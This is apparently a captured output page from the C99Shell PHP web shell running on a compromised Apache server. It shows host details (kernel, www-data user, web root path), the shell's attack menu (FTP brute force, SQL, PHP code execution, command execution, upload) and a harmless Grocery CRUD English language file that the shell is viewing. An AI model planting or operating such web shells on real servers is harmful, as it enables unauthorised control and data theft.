!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.4.18 (Ubuntu). PHP/7.0.33-0ubuntu0.16.04.16 

uname -a: Linux digifus 3.13.0-57-generic #95-Ubuntu SMP Fri Jun 19 09:28:15 UTC 2015 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/almazenServer/assets/grocery_crud/languages/   drwxr-xr-x
Free 10.05 GB of 29.4 GB (34.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     english.php (3.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $lang
['list_add']                 = 'Add';
    
$lang['list_actions']             = 'Actions';
    
$lang['list_page']                 = 'Page';
    
$lang['list_paging_of']         = 'of';
    
$lang['list_displaying']        = 'Displaying {start} to {end} of {results} items';
    
$lang['list_filtered_from']        = '(filtered from {total_results} total entries)';
    
$lang['list_show_entries']        = 'Show {paging} entries';
    
$lang['list_no_items']            = 'No items to display';
    
$lang['list_zero_entries']        = 'Displaying 0 to 0 of 0 items';
    
$lang['list_search']             = 'Search';
    
$lang['list_search_all']         = 'Search all';
    
$lang['list_clear_filtering']     = 'Clear filtering';
    
$lang['list_delete']             = 'Delete';
    
$lang['list_edit']                 = 'Edit';
    
$lang['list_paging_first']         = 'First';
    
$lang['list_paging_previous']     = 'Previous';
    
$lang['list_paging_next']         = 'Next';
    
$lang['list_paging_last']         = 'Last';
    
$lang['list_loading']             = 'Loading...';

    
$lang['form_edit']                 = 'Edit';
    
$lang['form_back_to_list']         = 'Back to list';
    
$lang['form_update_changes']     = 'Update changes';
    
$lang['form_cancel']             = 'Cancel';
    
$lang['form_update_loading']     = 'Loading, updating changes...';
    
$lang['update_success_message'] = 'Your data has been successfully updated.';
    
$lang['form_go_back_to_list']     = 'Go back to list';

    
$lang['form_add']                 = 'Add';
    
$lang['insert_success_message'] = 'Your data has been successfully stored into the database.';
    
$lang['form_or']                = 'or';
    
$lang['form_save']                 = 'Save';
    
$lang['form_insert_loading']     = 'Loading, saving data...';

    
$lang['form_upload_a_file']     = 'Upload a file';
    
$lang['form_upload_delete']     = 'delete';
    
$lang['form_button_clear']         = 'Clear';

    
$lang['delete_success_message'] = 'Your data has been successfully deleted from the database.';
    
$lang['delete_error_message']     = 'Your data was not deleted from the database.';

    
/* Javascript messages */
    
$lang['alert_add_form']            = 'The data you had insert may not be saved.\\nAre you sure you want to go back to list?';
    
$lang['alert_edit_form']        = 'The data you had change may not be saved.\\nAre you sure you want to go back to list?';
    
$lang['alert_delete']            = 'Are you sure that you want to delete this record?';

    
$lang['insert_error']            = 'An error has occurred on insert.';
    
$lang['update_error']            = 'An error has occurred on saving.';

    
/* Added in version 1.2.1 */
    
$lang['set_relation_title']        = 'Select {field_display_as}';
    
$lang['list_record']            = 'Record';
    
$lang['form_inactive']            = 'inactive';
    
$lang['form_active']            = 'active';

    
/* Added in version 1.2.2 */
    
$lang['form_save_and_go_back']    = 'Save and go back to list';
    
$lang['form_update_and_go_back']= 'Update and go back to list';

    
/* Added in version 1.2.2 */
    
$lang['form_save_and_go_back']    = 'Save and go back to list';
    
$lang['form_update_and_go_back']= 'Update and go back to list';

    
/* Upload functionality */
    
$lang['string_delete_file']     = "Deleting file";
    
$lang['string_progress']         = "Progress: ";
    
$lang['error_on_uploading']     = "An error has occurred on uploading.";
    
$lang['message_prompt_delete_file']     = "Are you sure that you want to delete this file?";

    
$lang['error_max_number_of_files']     = "You can only upload one file each time.";
    
$lang['error_accept_file_types']     = "You are not allow to upload this kind of extension.";
    
$lang['error_max_file_size']         = "The uploaded file exceeds the {max_file_size} directive that was specified.";
    
$lang['error_min_file_size']         = "You cannot upload an empty file.";

    
/* Added in version 1.3.1 */
    
$lang['list_export']     = "Export";
    
$lang['list_print']     = "Print";
    
$lang['minimize_maximize'] = 'Minimize/Maximize';
    
    
/* Added in version 1.4 */
    
$lang['list_view'] = 'View';

    
/* Added in version 1.5.1 */
    
$lang['ui_day'] = 'dd';
    
$lang['ui_month'] = 'mm';
    
$lang['ui_year'] = 'yyyy';

    
/* Added in version 1.5.2 */
    
$lang['list_more'] = 'More';


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.007 ]--